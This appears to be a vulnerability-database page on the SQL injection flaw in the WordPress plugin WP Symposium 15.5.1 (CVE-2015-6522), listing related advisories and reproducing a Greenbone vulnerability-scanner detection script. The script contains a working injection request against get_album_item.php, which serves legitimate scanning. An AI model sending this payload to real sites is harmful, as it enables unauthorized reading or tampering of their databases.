WordPress plugin 'WP Symposium' prone to multiple SQL injection vulnerabilities. Exploitation allows for SQL query manipulation or data disclosure. Affected version 15.5.1, solution is to update to version 15.8 or later
Reporter | Title | Published | Views | Family All 12 |
---|---|---|---|---|
![]() | WP Symposium <= 15.5.1 - Unauthenticated SQL Injection | 9 Aug 201500:00 | โ | wpvulndb |
![]() | WordPress Symposium Plugin SQL Injection (CVE-2015-6522) | 8 Dec 201600:00 | โ | checkpoint_advisories |
![]() | Sql injection | 19 Aug 201515:59 | โ | prion |
![]() | WordPress Symposium Plugin SQL Injection | 31 Aug 202400:00 | โ | packetstorm |
![]() | WP Symposium <= 15.5.1 - Unauthenticated SQL Injection | 9 Aug 201500:00 | โ | wpexploit |
![]() | WordPress Symposium Plugin 15.1 - SQL Injection #2 | 18 Aug 201500:00 | โ | patchstack |
![]() | WordPress Symposium Plugin <= 15.7- SQL Injection | 19 Aug 201500:00 | โ | patchstack |
![]() | WordPress Symposium Plugin SQL Injection | 17 Nov 201614:04 | โ | metasploit |
![]() | CVE-2015-6522 | 19 Aug 201515:00 | โ | cvelist |
![]() | CVE-2015-6522 | 19 Aug 201515:59 | โ | cve |
Source | Link |
---|---|
exploit-db | www.exploit-db.com/exploits/37824 |
exploit-db | www.exploit-db.com/exploits/37822 |
# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:wordpress:wordpress";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.806026");
script_version("2023-07-25T05:05:58+0000");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
script_tag(name:"creation_date", value:"2015-08-24 15:13:35 +0530 (Mon, 24 Aug 2015)");
script_tag(name:"qod_type", value:"remote_vul");
script_name("WordPress WP Symposium Multiple SQL Injection Vulnerabilities");
script_cve_id("CVE-2015-6522");
script_tag(name:"summary", value:"The WordPress plugin 'WP Symposium' is prone to multiple sql injection vulnerabilities.");
script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
check whether it is able to execute sql query or not.");
script_tag(name:"insight", value:"Multiple flaws are due to input validation
errors in 'forum_functions.php' and 'get_album_item.php' in WP Symposium
plugin.");
script_tag(name:"impact", value:"Successful exploitation will allow remote
attackers to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.");
script_tag(name:"affected", value:"WordPress WP Symposium Plugin version
15.5.1 and probably all existing previous versions may also be affected.");
script_tag(name:"solution", value:"Update to WP Symposium version 15.8 or
later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/37824");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/37822");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2015 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_wordpress_http_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("wordpress/http/detected");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
url = dir + "/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--";
if(http_vuln_check(port:port, url:url, check_header:TRUE, pattern:"([0-9.]+)",
extra_check:"Set-Cookie: PHPSESSID")) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo